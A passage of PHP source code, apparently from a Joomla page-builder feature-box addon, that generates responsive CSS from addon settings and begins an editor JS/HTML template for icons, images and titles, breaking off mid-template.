		$icon_margin_top_sm = (isset($settings->icon_margin_top_sm) && $settings->icon_margin_top_sm) ? $settings->icon_margin_top_sm : '';
		$icon_margin_top_xs = (isset($settings->icon_margin_top_xs) && $settings->icon_margin_top_xs) ? $settings->icon_margin_top_xs : '';
		$icon_margin_bottom	= (isset($settings->icon_margin_bottom) && $settings->icon_margin_bottom) ? $settings->icon_margin_bottom : '';
		$icon_margin_bottom_sm	= (isset($settings->icon_margin_bottom_sm) && $settings->icon_margin_bottom_sm) ? $settings->icon_margin_bottom_sm : '';
		$icon_margin_bottom_xs	= (isset($settings->icon_margin_bottom_xs) && $settings->icon_margin_bottom_xs) ? $settings->icon_margin_bottom_xs : '';
		$icon_padding = (isset($settings->icon_padding) && $settings->icon_padding) ? $settings->icon_padding : '';
		$feature_type = (isset($settings->feature_type) && $settings->feature_type) ? $settings->feature_type : 'icon';
		$feature_image = (isset($settings->feature_image) && $settings->feature_image) ? $settings->feature_image : '';
		$icon_name = (isset($settings->icon_name) && $settings->icon_name) ? $settings->icon_name : '';
		//Pixeden Icons
		$peicon_name = (isset($settings->peicon_name) && $settings->peicon_name) ? $settings->peicon_name : '';
		
		$title_position = (isset($settings->title_position) && $settings->title_position) ? $settings->title_position : '';

		//Css start
		$css = '';

		$text_style = '';
		$text_style_sm = '';
		$text_style_xs = '';

		$text_style .= (isset($settings->text_fontsize) && $settings->text_fontsize) ? "font-size: " . $settings->text_fontsize . "px;" : "";
		$text_style .= (isset($settings->text_fontweight) && $settings->text_fontweight) ? "font-weight: " . $settings->text_fontweight . ";" : "";
		$text_style_sm .= (isset($settings->text_fontsize_sm) && $settings->text_fontsize_sm) ? "font-size: " . $settings->text_fontsize_sm . "px;" : "";
		$text_style_xs .= (isset($settings->text_fontsize_xs) && $settings->text_fontsize_xs) ? "font-size: " . $settings->text_fontsize_xs . "px;" : "";
		
        $content_style = (isset($settings->text_background) && $settings->text_background) ? "background-color: " . $settings->text_background . ";" : "";
        $content_style .= (isset($settings->text_padding) && $settings->text_padding) ? "padding: " . $settings->text_padding . ";" : "";
        $content_style_sm = (isset($settings->text_padding_sm) && $settings->text_padding_sm) ? "padding: " . $settings->text_padding_sm . ";" : "";
        $content_style_xs = (isset($settings->text_padding_xs) && $settings->text_padding_xs) ? "padding: " . $settings->text_padding_xs . ";" : "";

		$text_style .= (isset($settings->text_lineheight) && $settings->text_lineheight) ? "line-height: " . $settings->text_lineheight . "px;" : "";
		$text_style_sm .= (isset($settings->text_lineheight_sm) && $settings->text_lineheight_sm) ? "line-height: " . $settings->text_lineheight_sm . "px;" : "";
		$text_style_xs .= (isset($settings->text_lineheight_xs) && $settings->text_lineheight_xs) ? "line-height: " . $settings->text_lineheight_xs . "px;" : "";

        $image_size = (isset($settings->feature_image_width) && $settings->feature_image_width) ? "width: " . $settings->feature_image_width . "%;" : "";
        $image_size_sm = (isset($settings->feature_image_width_sm) && $settings->feature_image_width_sm) ? "width: " . $settings->feature_image_width_sm . "%;" : "";
        $image_size_xs = (isset($settings->feature_image_width_xs) && $settings->feature_image_width_xs) ? "width: " . $settings->feature_image_width_xs . "%;" : "";

        $image_margin = (isset($settings->feature_image_margin) && $settings->feature_image_margin) ? "margin: " . $settings->feature_image_margin . ";" : "";
        $image_margin_sm = (isset($settings->feature_image_margin_sm) && $settings->feature_image_margin_sm) ? "margin: " . $settings->feature_image_margin_sm . ";" : "";
		$image_margin_xs = (isset($settings->feature_image_margin_xs) && $settings->feature_image_margin_xs) ? "margin: " . $settings->feature_image_margin_xs . ";" : "";

		if($text_style) {
			$css .= $addon_id . ' .sppb-addon-text {';
			$css .= $text_style;
			$css .= '}';
		}
		if(!empty($content_style)) {
			$css .= $addon_id . ' .sppb-media-content {';
			$css .= $content_style;
			$css .= '}';
		}

		if($text_style_sm || $content_style_sm) {
			$css .= '@media (min-width: 768px) and (max-width: 991px) {';
				$css .= $addon_id . ' .sppb-addon-text {';
				$css .= $text_style_sm;
				$css .= '}';
                if(!empty($content_style_sm)) {
                    $css .= $addon_id . ' .sppb-media-content {';
                    $css .= $content_style_sm;
                    $css .= '}';
                }
			$css .= '}';
		}

		if($text_style_xs || $content_style_xs) {
			$css .= '@media (max-width: 767px) {';
				$css .= $addon_id . ' .sppb-addon-text {';
				$css .= $text_style_xs;
				$css .= '}';
                if(!empty($content_style_xs)) {
                    $css .= $addon_id . ' .sppb-media-content {';
                    $css .= $content_style_xs;
                    $css .= '}';
                }
			$css .= '}';
		}

		if($feature_type == 'icon' || $feature_type == 'both') {
			if($icon_name || $peicon_name) {
				$style = '';
				// Icon Box Shadow
				$icon_boxshadow = (isset($settings->icon_boxshadow) && $settings->icon_boxshadow) ? $settings->icon_boxshadow : '';
				if(is_object($icon_boxshadow)){
					$ho = (isset($icon_boxshadow->ho) && $icon_boxshadow->ho != '') ? $icon_boxshadow->ho.'px' : '0px';
					$vo = (isset($icon_boxshadow->vo) && $icon_boxshadow->vo != '') ? $icon_boxshadow->vo.'px' : '0px';
					$blur = (isset($icon_boxshadow->blur) && $icon_boxshadow->blur != '') ? $icon_boxshadow->blur.'px' : '0px';
					$spread = (isset($icon_boxshadow->spread) && $icon_boxshadow->spread != '') ? $icon_boxshadow->spread.'px' : '0px';
					$color = (isset($icon_boxshadow->color) && $icon_boxshadow->color != '') ? $icon_boxshadow->color : '#fff';
					$style .= "box-shadow: ${ho} ${vo} ${blur} ${spread} ${color};";
				} else {
					$style .= "box-shadow: " . $icon_boxshadow . ";";
				}
				$style .= 'display:inline-block;text-align:center;';
				$style .= ($icon_padding) ? 'padding:' . (int) $icon_padding  . 'px;' : '';
				$style_sm = '';
				$style_xs = '';

				$icon_margin_tp = '';
				$icon_margin_tp_sm = '';
				$icon_margin_tp_xs = '';

				$icon_margin_tp .= ($icon_margin_top) ? 'margin-top:' . (int) $icon_margin_top . 'px;' : '';
				$icon_margin_tp_sm .= ($icon_margin_top_sm) ? 'margin-top:' . (int) $icon_margin_top_sm . 'px;' : '';
				$icon_margin_tp_xs .= ($icon_margin_top_xs) ? 'margin-top:' . (int) $icon_margin_top_xs . 'px;' : '';

				$icon_margin_btm = '';
				$icon_margin_btm_sm = '';
				$icon_margin_btm_xs = '';

				$icon_margin_btm .= ($icon_margin_bottom) ? 'margin-bottom:' . (int) $icon_margin_bottom . 'px;' : '';
				$icon_margin_btm_sm .= ($icon_margin_bottom_sm) ? 'margin-bottom:' . (int) $icon_margin_bottom_sm . 'px;' : '';
				$icon_margin_btm_xs .= ($icon_margin_bottom_xs) ? 'margin-bottom:' . (int) $icon_margin_bottom_xs . 'px;' : '';

				$icon_padding_md = '';
				$icon_paddings_md = explode(' ', $icon_padding);
				foreach($icon_paddings_md as $icon_padding_md_item){
					if(empty(trim($icon_padding_md_item))){
						$icon_padding_md .= ' 0';
					} else {
						$icon_padding_md .= ' '.$icon_padding_md_item;
					}

				}
				$style .= ($icon_padding_md) ? 'padding:' . $icon_padding_md . ';' : '';

				$icon_padding_sm = '';

				if(trim($icon_padding_sm) != ""){
					$icon_paddings_sm = explode(' ', $icon_padding_sm);
					foreach($icon_paddings_sm as $icon_padding_sm_item){
						if(empty(trim($icon_padding_sm_item))){
							$icon_padding_sm .= ' 0';
						} else {
							$icon_padding_sm .= ' '.$icon_padding_sm_item;
						}

					}
				}

				$style_sm .= ($icon_padding_sm) ? 'padding:' . $icon_padding_sm . ';' : '';

				$icon_padding_xs = '';

				if(trim($icon_padding_xs) != ""){
					$icon_paddings_xs = explode(' ', $icon_padding_xs);
					foreach($icon_paddings_xs as $icon_padding_xs_item){
						if(empty(trim($icon_padding_xs_item))){
							$icon_padding_xs .= ' 0';
						} else {
							$icon_padding_xs .= ' '.$icon_padding_xs_item;
						}

					}
				}

				$style_xs .= ($icon_padding_xs) ? 'padding:' . $icon_padding_xs . ';' : '';

				$style .= ($icon_color) ? 'color:' . $icon_color  . ';' : '';
				$style .= ($icon_background) ? 'background-color:' . $icon_background  . ';' : '';
				$style .= ($icon_border_color) ? 'border-style:solid;border-color:' . $icon_border_color  . ';' : '';
				

				$style .= ($icon_border_width) ? 'border-width:' . (int) $icon_border_width . 'px;' : '';
				//$style .= ($icon_padding) ? 'padding:' . (int) $icon_padding  . 'px;' : '';
				
				$style_sm .= ($icon_border_width_sm) ? 'border-width:' . (int) $icon_border_width_sm . 'px;' : '';
				$style_xs .= ($icon_border_width_xs) ? 'border-width:' . (int) $icon_border_width_xs . 'px;' : '';

				$style .= ($icon_border_radius) ? 'border-radius:' . (int) $icon_border_radius  . 'px;' : '';
				$style_sm .= ($icon_border_radius_sm) ? 'border-radius:' . (int) $icon_border_radius_sm  . 'px;' : '';
				$style_xs .= ($icon_border_radius_xs) ? 'border-radius:' . (int) $icon_border_radius_xs  . 'px;' : '';

				$font_size 	= (isset($icon_size) && $icon_size) ? 'font-size:' . (int) $icon_size . 'px;width:' . (int) $icon_size . 'px;height:' . (int) $icon_size . 'px;line-height:' . (int) $icon_size . 'px;' : '';
				$font_size_sm 	= (isset($icon_size_sm) && $icon_size_sm) ? 'font-size:' . (int) $icon_size_sm . 'px;width:' . (int) $icon_size_sm . 'px;height:' . (int) $icon_size_sm . 'px;line-height:' . (int) $icon_size_sm . 'px;' : '';
				$font_size_xs 	= (isset($icon_size_xs) && $icon_size_xs) ? 'font-size:' . (int) $icon_size_xs . 'px;width:' . (int) $icon_size_xs . 'px;height:' . (int) $icon_size_xs . 'px;line-height:' . (int) $icon_size_xs . 'px;' : '';


				if($icon_margin_tp || $icon_margin_btm) {
					$css .= $addon_id . ' .sppb-icon {';
					$css .= $icon_margin_tp;
					$css .= $icon_margin_btm;
					$css .= '}';
				}

				if($style) {
					$css .= $addon_id . ' .sppb-icon .sppb-icon-container {';
					$css .= $style;
					$css .= '}';
				}

				if($font_size) {
					$css .= $addon_id . ' .sppb-icon .sppb-icon-container > i {';
					$css .= $font_size;
					$css .= '}';
				}
				if(!empty($style_sm) || !empty($font_size_sm)){
					$css .= '@media (min-width: 768px) and (max-width: 991px) {';
						if($icon_margin_btm_sm || $icon_margin_tp_sm) {
							$css .= $addon_id . ' .sppb-icon {';
							$css .= $icon_margin_tp_sm;
							$css .= $icon_margin_btm_sm;
							$css .= '}';
						}
						if($style_sm) {
							$css .= $addon_id . ' .sppb-icon .sppb-icon-container {';
							$css .= $style_sm;
							$css .= '}';
						}

						if($font_size_sm) {
							$css .= $addon_id . ' .sppb-icon .sppb-icon-container > i {';
							$css .= $font_size_sm;
							$css .= '}';
						}
					$css .= '}';
				}

				if(!empty($style_xs) || !empty($font_size_xs)){
					$css .= '@media (max-width: 767px) {';
						if($icon_margin_btm_xs || $icon_margin_tp_xs) {
							$css .= $addon_id . ' .sppb-icon {';
							$css .= $icon_margin_tp_xs;
							$css .= $icon_margin_btm_xs;
							$css .= '}';
						}
						if($style_xs) {
							$css .= $addon_id . ' .sppb-icon .sppb-icon-container {';
							$css .= $style_xs;
							$css .= '}';
						}

						if($font_size_xs) {
							$css .= $addon_id . ' .sppb-icon .sppb-icon-container > i {';
							$css .= $font_size_xs;
							$css .= '}';
						}
					$css .= '}';
				}
			}
		}
        if($feature_image && ($feature_type == 'both' || $feature_type =='image')) {
            $img_style = 'display:block;';

            if($img_style) {
                $css .= $addon_id . ' .sppb-img-container {';
                $css .= $img_style;
                $css .= '}';
            }
            if(!empty($image_size)){
                $css .= $addon_id . ' .sppb-media .pull-left, '. $addon_id .' .sppb-media .pull-right {';
                $css .= $image_size;
                $css .= '}';
            }
            if(isset($settings->feature_image_width) && $settings->feature_image_width == '100'){
                $css .= $addon_id . ' .sppb-media .sppb-media-body {';
                $css .= 'width: 100%;';
                $css .= '}';
            }
            if(!empty($image_margin) && ($title_position == 'left' || $title_position == 'right')){
                $css .= $addon_id . ' .sppb-media .pull-left, '. $addon_id .' .sppb-media .pull-right {';
                $css .= $image_margin;
                $css .= '}';
            }
            if(!empty($image_margin) && ($title_position == 'after' || $title_position == 'before')) {
                $css .= $addon_id . ' .sppb-img-container {';
                $css .= $image_margin;
                $css .= '}';
            }
        }
		
                
        $css .= '@media (min-width: 768px) and (max-width: 991px) {';
            if(!empty($image_size_sm)) {
                $css .= $addon_id . ' .sppb-media .pull-left, '. $addon_id .' .sppb-media .pull-right {';
                $css .= $image_size_sm;
                $css .= '}';
            }
            if(!empty($image_margin_sm) && ($title_position == 'left' || $title_position == 'right')){
                $css .= $addon_id . ' .sppb-media .pull-left, '. $addon_id .' .sppb-media .pull-right {';
                $css .= $image_margin_sm;
                $css .= '}';
            }
            if(!empty($image_margin_sm) && ($title_position == 'after' || $title_position == 'before')) {
                $css .= $addon_id . ' .sppb-img-container {';
                $css .= $image_margin_sm;
                $css .= '}';
            }
            if(isset($settings->feature_image_width_sm) && $settings->feature_image_width_sm == '100'){
                $css .= $addon_id . ' .sppb-media .sppb-media-body {';
                $css .= 'width: 100%;';
                $css .= '}';
            } else {
                $css .= $addon_id . ' .sppb-media .sppb-media-body {';
                $css .= 'width: auto;';
                $css .= '}';
            }
        $css .= '}';


        $css .= '@media (max-width: 767px) {';
            if(!empty($image_size_xs)) {
                $css .= $addon_id . ' .sppb-media .pull-left, '. $addon_id .' .sppb-media .pull-right {';
                $css .= $image_size_xs;
                $css .= '}';
            }
            if(!empty($image_margin_xs) && ($title_position == 'left' || $title_position == 'right')){
                $css .= $addon_id . ' .sppb-media .pull-left, '. $addon_id .' .sppb-media .pull-right {';
                $css .= $image_margin_xs;
                $css .= '}';
            }
            if(!empty($image_margin_xs) && ($title_position == 'after' || $title_position == 'before')) {
                    $css .= $addon_id . ' .sppb-img-container {';
                    $css .= $image_margin_xs;
                    $css .= '}';
            }
            if(isset($settings->feature_image_width_xs) && $settings->feature_image_width_xs == '100'){
                $css .= $addon_id . ' .sppb-media .sppb-media-body {';
                $css .= 'width: 100%;';
                $css .= '}';
            } else {
                $css .= $addon_id . ' .sppb-media .sppb-media-body {';
                $css .= 'width: auto;';
                $css .= '}';
            }
		$css .= '}';
		
		//Hover options
		$addon_hover = '';
		$addon_hover .= (isset($settings->addon_hover_bg) && $settings->addon_hover_bg) ? 'background:'.$settings->addon_hover_bg.';' : '';
		$addon_hover .= (isset($settings->addon_hover_color) && $settings->addon_hover_color) ? 'color:'.$settings->addon_hover_color.';' : '';
		$addon_hover_boxshadow = (isset($settings->addon_hover_boxshadow) && $settings->addon_hover_boxshadow) ? $settings->addon_hover_boxshadow : '';
		if(is_object($addon_hover_boxshadow)){
			$ho = (isset($addon_hover_boxshadow->ho) && $addon_hover_boxshadow->ho != '') ? $addon_hover_boxshadow->ho.'px' : '0px';
			$vo = (isset($addon_hover_boxshadow->vo) && $addon_hover_boxshadow->vo != '') ? $addon_hover_boxshadow->vo.'px' : '0px';
			$blur = (isset($addon_hover_boxshadow->blur) && $addon_hover_boxshadow->blur != '') ? $addon_hover_boxshadow->blur.'px' : '0px';
			$spread = (isset($addon_hover_boxshadow->spread) && $addon_hover_boxshadow->spread != '') ? $addon_hover_boxshadow->spread.'px' : '0px';
			$color = (isset($addon_hover_boxshadow->color) && $addon_hover_boxshadow->color != '') ? $addon_hover_boxshadow->color : '#fff';
			$addon_hover .= "box-shadow: ${ho} ${vo} ${blur} ${spread} ${color};";
		} else {
			$addon_hover .= "box-shadow: " . $addon_hover_boxshadow . ";";
		}
		if(!empty($addon_hover)) {
			$css .= $addon_id . '{';
			$css .= 'transition:.3s;';
			$css .= '}';
			$css .= $addon_id . ':hover{';
			$css .= $addon_hover;
			$css .= '}';
		}

		if(isset($settings->title_hover_color) && $settings->title_hover_color) {
			$css .= $addon_id . ' .sppb-feature-box-title{';
				$css .= 'transition:.3s;';
			$css .='}';
			$css .= $addon_id . ':hover .sppb-feature-box-title {';
				$css .= 'color:'.$settings->title_hover_color.';';
			$css .='}';
		}
		if((isset($settings->icon_hover_bg) && $settings->icon_hover_bg) || (isset($settings->icon_hover_color) && $settings->icon_hover_color)) {
			$css .= $addon_id . ' .sppb-icon .sppb-icon-container{';
				$css .= 'transition:.3s;';
			$css .= '}';
			$css .= $addon_id . ':hover .sppb-icon .sppb-icon-container{';
				$css .= 'background:'.$settings->icon_hover_bg.';';
				$css .= 'color:'.$settings->icon_hover_color.';';
			$css .= '}';
		}

		return $css;
	}

	public static function getTemplate() {

		$output = '
		<#
			var text_alignment = (data.alignment) ? data.alignment : "";

			let icon_arr = (typeof data.icon_name !== "undefined" && data.icon_name) ? data.icon_name.split(" ") : "";
			let icon_name = icon_arr.length === 1 ? "fa "+data.icon_name : data.icon_name;

			var icon_image_position = "";
			if(data.title_position == "before") {
				icon_image_position = "after";
			} else if(data.title_position == "after") {
				icon_image_position = "before";
			} else {
				icon_image_position = data.title_position;
			}

            var alignment = "";
			if( ( icon_image_position == "left" ) || ( icon_image_position == "right" ) ) {
				alignment = "sppb-text-" + icon_image_position;
			}

			var media = "";
			if(data.feature_type == "icon") {
				if(data.peicon_name){
					media += \'<div class="sppb-icon">\';
						if( (data.title_url && data.url_appear == "icon") || (data.title_url && data.url_appear == "both" ) ){
							media += \'<a href="\'+data.title_url+\'">\';
						}
						media += \'<span class="sppb-icon-container">\';
							media += \'<i class="pe \'+data.peicon_name+\'"></i>\';
						media += \'</span>\';
						if( (data.title_url && data.url_appear == "icon") || (data.title_url && data.url_appear == "both" ) ){
							media += \'</a>\';
						}
					media += \'</div>\';
				} else {
					media += \'<div class="sppb-icon">\';
						if( (data.title_url && data.url_appear == "icon") || (data.title_url && data.url_appear == "both" ) ){
							media += \'<a href="\'+data.title_url+\'">\';
						}
						media += \'<span class="sppb-icon-container">\';
							media  += \'<i class="fa \'+data.icon_name+\'"></i>\';
						media += \'</span>\';
						if( (data.title_url && data.url_appear == "icon") || (data.title_url && data.url_appear == "both" ) ){
							media += \'</a>\';
						}
					media += \'</div>\';
				}
			} else {
					var feature_image = {}
					if (typeof data.feature_image !== "undefined" && typeof data.feature_image.src !== "undefined") {
						feature_image = data.feature_image
					} else {
						feature_image = {src: data.feature_image}
					}
                    if(feature_image.src){
                        media  += \'<span class="sppb-img-container">\';
                        if( (data.title_url && data.url_appear == "icon") || (data.title_url && data.url_appear == "both" ) ){
                            media += \'<a href="\'+data.title_url+\'">\';
                        }
                        if(feature_image.src.indexOf("http://") != -1 || feature_image.src.indexOf("https://") != -1){
                            media  += \'<img class="sppb-img-responsive" src="\'+feature_image.src+\'" alt="\'+data.title+\'">\';
                        } else {
                            media  += \'<img class="sppb-img-responsive" src="\'+pagebuilder_base+feature_image.src+\'" alt="\'+data.title+\'">\';
                        }
                        if( (data.title_url && data.url_appear == "icon") || (data.title_url && data.url_appear == "both" ) ){
                            media += \'</a>\';
                        }
                        media  += \'</span>\';
                    }
                }
				var image_icon = "";
				if(data.feature_type == "both" && (data.icon_name || data.peicon_name)) {
					image_icon += \'<div class="sppb-icon">\';
						if( (data.title_url && data.url_appear == "icon") || (data.title_url && data.url_appear == "both" ) ){
							image_icon += \'<a href="\'+data.title_url+\'">\';
						}
						image_icon  += \'<span class="sppb-icon-container">\';
						if(data.peicon_name){
							image_icon += \'<i class="pe \'+data.peicon_name+\'"></i>\';
								
						} else {
							image_icon += \'<i class="fa \'+data.icon_name+\'"></i>\';
						}
						image_icon += \'</span>\';
						if( (data.title_url && data.url_appear == "icon") || (data.title_url && data.url_appear == "both" ) ){
							image_icon += \'</a>\';
						}
					image_icon += \'</div>\';
				}


			var feature_title = "";
			if(data.title) {
				var heading_class = "";
				if( ( icon_image_position == "left" ) || ( icon_image_position == "right" ) ) {
					heading_class = " sppb-media-heading";
				}

				feature_title += \'<\'+data.heading_selector+\' class="sppb-addon-title sppb-feature-box-title  \'+heading_class+\'">\';
				if( (data.title_url && data.url_appear == "title") || (data.title_url && data.url_appear == "both" ) ){
					feature_title += \'<a href="\'+data.title_url+\'" class="sp-inline-editable-element" data-id="\'+data.id+\'" data-fieldName="title" contenteditable="true">\';
				}
				if(_.isEmpty(data.title_url)){
					feature_title += \'<span class="sp-inline-editable-element" data-id="\'+data.id+\'" data-fieldName="title" contenteditable="true">\';
				}
				feature_title +=data.title;
				if(_.isEmpty(data.title_url)){
					feature_title +=\'</span>\';
				}
				if( (data.title_url && data.url_appear == "title") || (data.title_url && data.url_appear == "both" ) ){
					feature_title += \'</a>\';
				}
				feature_title += \'</\'+data.heading_selector+\'>\';
			}

			var feature_text  = \'<div id="addon-text-\'+data.id+\'" class="sppb-addon-text sp-editable-content" data-id="\'+data.id+\'" data-fieldName="text">\';
			feature_text += data.text;
			feature_text += \'</div>\';

			var title_font_style = data.title_fontstyle || "";

			var icon_padding = "";
			var icon_padding_sm = "";
			var icon_padding_xs = "";
			if(data.icon_padding){
				if(_.isObject(data.icon_padding)){
					if(_.trim(data.icon_padding.md) !== ""){
						icon_padding = _.split(data.icon_padding.md, " ").map(item => {
							if(_.isEmpty(item)){
								return "0";
							}
							return item;
						}).join(" ")
					}

					if(_.trim(data.icon_padding.sm) !== ""){
						icon_padding_sm = _.split(data.icon_padding.sm, " ").map(item => {
							if(_.isEmpty(item)){
								return "0";
							}
							return item;
						}).join(" ")
					}

					if(_.trim(data.icon_padding.xs) !== ""){
						icon_padding_xs = _.split(data.icon_padding.xs, " ").map(item => {
							if(_.isEmpty(item)){
								return "0";
							}
							return item;
						}).join(" ")
					}
				} else {
					if(_.trim(data.icon_padding) !== ""){
						icon_padding = _.split(data.icon_padding, " ").map(item => {
							if(_.isEmpty(item)){
								return "0";
							}
							return item;
						}).join(" ")
					}
				}

			}
		#>
		<style type="text/css">
		<# 
			var modern_font_style = false;
			var classList = "";
			classList += " sppb-btn-"+data.btn_type;
			classList += " sppb-btn-"+data.btn_size;
			classList += " sppb-btn-"+data.btn_shape;
			if(!_.isEmpty(data.btn_appearance)){
				classList += " sppb-btn-"+data.btn_appearance;
			}
			classList += " "+data.btn_block;

			var button_fontstyle = data.btn_font_style || "";
			var button_font_style = data.btn_font_style || "";
		if(data.feature_type == "icon" || data.feature_type == "both"){
			if(data.peicon_name || data.icon_name){
		#>
				#sppb-addon-{{ data.id }} .sppb-icon {
					<# if(_.isObject(data.icon_margin_top)){ #>
						margin-top: {{ data.icon_margin_top.md }}px;
					<# } else { #>
						margin-top: {{ data.icon_margin_top }}px;
					<# } #>
					<# if(_.isObject(data.icon_margin_bottom)){ #>
						margin-bottom: {{ data.icon_margin_bottom.md }}px;
					<# } else { #>
						margin-bottom: {{ data.icon_margin_bottom }}px;
					<# } #>
				}
				#sppb-addon-{{ data.id }} .sppb-icon .sppb-icon-container{
					display:inline-block;
					text-align:center;
					padding: {{ icon_padding }};
					color: {{ data.icon_color }};
					background-color: {{ data.icon_background }};
					<# if(_.isObject(data.icon_border_width) && !_.isEmpty(data.icon_border_width.md)){ #>
						border-style:solid;
						border-color: {{ data.icon_border_color }};
						border-width: {{ data.icon_border_width.md }}px;
					<# } else if(!_.isEmpty(data.icon_border_width)) { #>
						border-style:solid;
						border-color: {{ data.icon_border_color }};
						border-width: {{ data.icon_border_width }}px;
					<# } #>
					<# if(_.isObject(data.icon_border_radius)){ #>
						border-radius: {{ data.icon_border_radius.md }}px;
					<# } else { #>
						border-radius: {{ data.icon_border_radius }}px;
					<# }
					if(_.isObject(data.icon_boxshadow)){
						let ho = data.icon_boxshadow.ho || 0,
							vo = data.icon_boxshadow.vo || 0,
							blur = data.icon_boxshadow.blur || 0,
							spread = data.icon_boxshadow.spread || 0,
							color = data.icon_boxshadow.color || 0;
					#>
						box-shadow: {{ho}}px {{vo}}px {{blur}}px {{spread}}px {{color}};
					<# } else { #>
						box-shadow: {{data.icon_boxshadow}};
					<# } #>
				}

				#sppb-addon-{{ data.id }} .sppb-icon .sppb-icon-container > i{
					<# if(_.isObject(data.icon_size)){ #>
						font-size: {{ data.icon_size.md }}px;
						width: {{ data.icon_size.md }}px;
						height: {{ data.icon_size.md }}px;
						line-height: {{ data.icon_size.md }}px;
					<# } else { #>
						font-size: {{ data.icon_size }}px;
						width: {{ data.icon_size }}px;
						height: {{ data.icon_size }}px;
						line-height: {{ data.icon_size }}px;
					<# } #>

				}
				@media (min-width: 768px) and (max-width: 991px) {
					#sppb-addon-{{ data.id }} .sppb-icon {
						<# if(_.isObject(data.icon_margin_top)){ #>
							margin-top: {{ data.icon_margin_top.sm }}px;
						<# } #>
						<# if(_.isObject(data.icon_margin_bottom)){ #>
							margin-bottom: {{ data.icon_margin_bottom.sm }}px;
						<# } #>
					}
					#sppb-addon-{{ data.id }} .sppb-icon .sppb-icon-container{
						padding: {{ icon_padding_sm }};
						<# if(_.isObject(data.icon_border_width) && !_.isEmpty(data.icon_border_width.sm)){ #>
							border-width: {{ data.icon_border_width.sm }}px;
						<# } #>
						<# if(_.isObject(data.icon_border_radius)){ #>
							border-radius: {{ data.icon_border_radius.sm }}px;
						<# } #>
					}

					#sppb-addon-{{ data.id }} .sppb-icon .sppb-icon-container > i{
						<# if(_.isObject(data.icon_size)){ #>
							font-size: {{ data.icon_size.sm }}px;
							width: {{ data.icon_size.sm }}px;
							height: {{ data.icon_size.sm }}px;
							line-height: {{ data.icon_size.sm }}px;
						<# } #>
					}
				}
				@media (max-width: 767px) {
					#sppb-addon-{{ data.id }} .sppb-icon {
						<# if(_.isObject(data.icon_margin_top)){ #>
							margin-top: {{ data.icon_margin_top.xs }}px;
						<# } #>
						<# if(_.isObject(data.icon_margin_bottom)){ #>
							margin-bottom: {{ data.icon_margin_bottom.xs }}px;
						<# } #>
					}
					#sppb-addon-{{ data.id }} .sppb-icon .sppb-icon-container{
						padding: {{ icon_padding_xs }};
						<# if(_.isObject(data.icon_border_width) && !_.isEmpty(data.icon_border_width.xs)){ #>
							border-width: {{ data.icon_border_width.xs }}px;
						<# } #>
						<# if(_.isObject(data.icon_border_radius)){ #>
							border-radius: {{ data.icon_border_radius.xs }}px;
						<# } #>
					}

					#sppb-addon-{{ data.id }} .sppb-icon .sppb-icon-container > i{
						<# if(_.isObject(data.icon_size)){ #>
							font-size: {{ data.icon_size.xs }}px;
							width: {{ data.icon_size.xs }}px;
							height: {{ data.icon_size.xs }}px;
							line-height: {{ data.icon_size.xs }}px;
						<# } #>
					}
				}
			<# } #>
			<# } if(data.feature_type == "image" || data.feature_type == "both") { #>
				#sppb-addon-{{ data.id }} .sppb-img-container {
					display:block;
				}
				<# if(!_.isEmpty(data.feature_image_margin) && (data.title_position == "left" || data.title_position == "right")){ #>
					#sppb-addon-{{ data.id }} .sppb-media .pull-left, #sppb-addon-{{ data.id }} .sppb-media .pull-right {
						<# if(_.isObject(data.feature_image_margin)){ #>
							margin: {{data.feature_image_margin.md}};
						<# } else { #>
							margin: {{data.feature_image_margin}};
						<# } #>
					}
				<# }
				if(_.isObject(data.feature_image_width) && data.feature_image_width.md === "100"){ #>
					#sppb-addon-{{ data.id }} .sppb-media .sppb-media-body {
						width: 100%;
					}
				<# }
				if(!_.isEmpty(data.feature_image_margin) && (data.title_position == "after" || data.title_position == "before")) { #>
					#sppb-addon-{{ data.id }} .sppb-img-container {
						<# if(_.isObject(data.feature_image_margin)){ #>
							margin: {{data.feature_image_margin.md}};
						<# } else { #>
							margin: {{data.feature_image_margin}};
						<# } #>
					}
				<# } #>
				#sppb-addon-{{ data.id }} .sppb-media .pull-left, #sppb-addon-{{ data.id }} .sppb-media .pull-right {
					<# if(_.isObject(data.feature_image_width)){ #>
						width: {{ data.feature_image_width.md }}%;
					<# } else { #>
						width: {{ data.feature_image_width }}%;
					<# } #>
				}
				@media (min-width: 768px) and (max-width: 991px) {
					#sppb-addon-{{ data.id }} .sppb-media .pull-left, #sppb-addon-{{ data.id }} .sppb-media .pull-right {
						<# if(_.isObject(data.feature_image_width)){ #>
							width: {{ data.feature_image_width.sm }}%;
						<# } #>
					}
					<# if(!_.isEmpty(data.feature_image_margin) && (data.title_position == "left" || data.title_position == "right")){ #>
						#sppb-addon-{{ data.id }} .sppb-media .pull-left, #sppb-addon-{{ data.id }} .sppb-media .pull-right {
							<# if(_.isObject(data.feature_image_margin)){ #>
								margin: {{data.feature_image_margin.sm}};
							<# } #>
						}
					<# }
					if(_.isObject(data.feature_image_width) && (data.feature_image_width.sm === "100")){ #>
						#sppb-addon-{{ data.id }} .sppb-media .sppb-media-body {
							width: 100%;
						}
					<# } else { #>
						#sppb-addon-{{ data.id }} .sppb-media .sppb-media-body {
							width: auto;
						}
					<# }
					if(!_.isEmpty(data.feature_image_margin) && (data.title_position == "after" || data.title_position == "before")) { #>
						#sppb-addon-{{ data.id }} .sppb-img-container {
							<# if(_.isObject(data.feature_image_margin)){ #>
								margin: {{data.feature_image_margin.sm}};
							<# } #>
						}
					<# } #>
				}
				@media (max-width: 767px) {
					#sppb-addon-{{ data.id }} .sppb-media .pull-left, #sppb-addon-{{ data.id }} .sppb-media .pull-right {
						<# if(_.isObject(data.feature_image_width)){ #>
							width: {{ data.feature_image_width.xs }}%;
						<# } #>
					}
					<# if(!_.isEmpty(data.feature_image_margin) && (data.title_position == "left" || data.title_position == "right")){ #>
						#sppb-addon-{{ data.id }} .sppb-media .pull-left, #sppb-addon-{{ data.id }} .sppb-media .pull-right {
							<# if(_.isObject(data.feature_image_margin)){ #>
								margin: {{data.feature_image_margin.xs}};
							<# } #>
						}
					<# }
					if(_.isObject(data.feature_image_width) && data.feature_image_width.xs === "100"){ #>
						#sppb-addon-{{ data.id }} .sppb-media .sppb-media-body {
							width: 100%;
						}
					<# } else { #>
						#sppb-addon-{{ data.id }} .sppb-media .sppb-media-body {
							width: auto;
						}
					<# }
					if(!_.isEmpty(data.feature_image_margin) && (data.title_position == "after" || data.title_position == "before")) { #>
						#sppb-addon-{{ data.id }} .sppb-img-container {
							<# if(_.isObject(data.feature_image_margin)){ #>
								margin: {{data.feature_image_margin.xs}};
